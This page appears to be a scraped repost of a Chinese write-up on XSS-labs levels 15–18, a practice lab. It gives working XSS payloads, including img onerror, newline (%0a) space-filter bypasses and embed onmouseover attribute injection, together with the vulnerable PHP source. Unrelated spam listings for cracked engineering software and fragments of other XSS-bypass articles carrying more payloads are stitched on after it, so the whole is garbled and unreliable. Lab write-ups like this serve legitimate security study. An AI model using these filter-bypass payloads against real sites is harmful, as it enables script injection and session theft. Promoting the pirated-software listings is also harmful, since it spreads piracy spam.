Xss-labs-level15-18

level15

看了一下源码，啥也没发现；

AngularJS ng-include 指令：

包含的内容将作为指定元素的子节点。

ng-include 属性的值可以是一个表达式，返回一个文件名。

默认情况下，包含的文件需要包含在同一个域名下。

指向“https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js”的 <script> 加载失败

更换为：

https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js

src=‘level1.php?name=test<img src=1 onerror=alert()>‘

level16

<a%0atype="text"%0a"alert">

用换行符%0a取代空格，在html中同样可以运行

<img%0asrc="1.jpg"%0aonerror="alert(1)">

<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("    ","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>
<?php

过滤了，空格，script和/

level17

<embed src=xsf01.swf?a=b width=100% heigth=100%>

看到了关键的一句

<embed> 元素将外部内容嵌入文档中的指定位置。此内容由外部应用程序或其他交互式内容源（如浏览器插件）提供。

在embed标签中，src的属性值没有引号，所以在输入arg02时在b之后加一个空格，浏览器到b就停止判断，给src加上双引号；而将onmouseover看作另外一个属性

onmouseover=alert(‘xss‘)

<embed src="xsf01.swf?a=b" onmouseover="alert(‘xss‘)" heigth="100%" width="100%">

后台源码:

<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>

Level18

http://localhost/xss/level18.php?arg01=a&arg02=b%20onmouseover=alert()

<embed src="xsf02.swf?a=b" onmouseover="alert()" heigth="100%" width="100%">

原文地址：https://www.cnblogs.com/delongzhang/p/12219048.html

时间： 2024-10-31 23:15:07

Xss-labs-level15-18的相关文章

Autodesk PowerMill 2017 SP1 v21.0.30.64.1203015 1DVD

Isotropix.Clarisse.iFX.v3.0.SP3.Win64 1CD Mentor.Graphics.Calibre.2016.1.Linux 2DVD Progman Oy MagiCAD for Revit MEP 2016.4 UR-1 and 2015.11 1DVD Simulation.Lab.Software.SimLab.Composer.7.v7.2.0.MacOSX 1CD Stat-Ease.Design.Expert.v10.0.3.1.Win64 1CD

工业锻造过程仿真分析软件 Simufact.Forming v13.3.1

MSC.SIMUFACT.FORMING.V13.3-MAGNiTUDE\ Simufact.Forming v13.3.1 1DVD Simufact 是一套工业锻造过程仿真分析软件,由功能极强的有限体积求解器和WINDOWS风格的图形接口的所集成友好仿真分析运用软件.利用Simufact的锻造模拟技术,能够作出更快.更经济的仿真试验,加快产品导入市场的时间. 锻造是高度非线性工艺过程,需要材料和模具与工件之间复杂的相互作用.在多数情形下,锻造的毛坯形状相当简单,但最终产品的几何形状非常复杂,

三维设计软件的世界领导者Autodesk.Delcam.2017.SP2.Suite

Autodesk.Delcam.2017.SP2.Suite 6CD3.9G Autodesk公司在娱乐.自然资源.制造.工程.建筑三维设计软件的世界领导者,和民用基础设施,宣布Autodesk Delcam 2017 SP2套件发布.这些产品结合CAM软件行业领导的遗产从Delcam与Autodesk公司的三维设计和制造实力,呈现Autodesk凸轮客户提供强大的和独特的用户体验. 欧特克正在迎来新2017计算机辅助制造(CAM)的产品为众多的先进制造业的应用范围从数控铣床和车床编程复杂的模具

全模块及最新好用软件吧

Wolfram Mathematica 11.0.0.0 Windows 1DVD Intel Parallel Studio XE 2017 1DVD Mentor.Graphics.FloEFD.15.2.0.3564.Suite.Win64 1DVD+3CD MentorGraphics FloTHERM 11.2 Suite Win/Linux 5CD Autodesk.Advance.Concrete.2017 Win64 1DVD Graebert ARES CommanderEdi

提供全面石油天然气建筑风电场建筑ACS CONNECT Edition 10.02

Bentley是全球领导者,致力于为建筑师,工程师,建设者和业主运营商提供全面的架构和工程软件解决方案,以支持基础设施建设.宾利成立于1984年,在45个国家拥有近3,000名同事,年收入5亿美元,自2001年以来,已经投资超过10亿美元用于研究,开发和收购Bentley系统公司已发布SACS CONNECT Edition 10.02.00.01,是用于分析和设计新的和现有的固定式近海石油和天然气建筑和风电场建筑分析设计软件. Avenza Geographic Imager for Adob

效解决的关键ZondGM2D 2.0

务得以有效解决的关键ZondGM2D 2.0 ZondGM2d 2.0为重力和磁法测量数据的解释提供了解决方案,从数学建模到现场数据的解释,其都提供了广泛的工具.友好的用户界面和可视化的可能性,是地质任务得以有效解决的关键.跟以往的软件不一样,ZondGM2D 2.0提供了三种模型类型:由常规的网格化和单元化的模型,对于解决逆向问题,这一类型是最有用的(自动密度或磁化率恢复).逆向结果是一个进一步地质和地球物理解释的良好开端.许多的逆向算法在软件中都能实现,最重要的是平滑和聚集逆向,用于

owaspbwa tickets

owaspbwa tickets 来源 https://sourceforge.net/p/owaspbwa/tickets/ 192 SQL Injection in pic_id parameter Peruggia High 191 1 AWStats Medium 190 GetBoo reflected XSS in http:/?/?owaspbwa/?getboo/?psearch.php GetBoo Medium 34 CSRF to change password and

XSS插入绕过一些方式总结

详见:http://blog.csdn.net/keepxp/article/details/52054388 1 常规插入及其绕过 1.1 Script 标签绕过进行一次移除操作: <scr<script>ipt>alert("XSS")</scr<script>ipt> Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本: <script>alert("XSS")</script

1.6 xss挑战平台练习

------------------------- XSS挑战之旅 ------------------------- 最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境: xss通关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码:85g8 我这里使用本地搭建,方便分析代码,安装好的页面如下: Level 1: 分析一下源代码中的判

xss脚本绕过限制的方法

第一关:第一关比较简单,直接写入标签就可以,这里不多说了,payload如下: http://sqler.win/xss/level1.php?name=test%3Csvg/onload=alert(1)%3E 第二关: 第二关是比较典型的搜索框XSS,搜索内容直接写入input标签内,这里有很多种XSS的方式,我的payload是http://sqler.win/xss /level2.php?keyword=test%22%3E%3Csvg/onload=alert(1)%3E 第三关: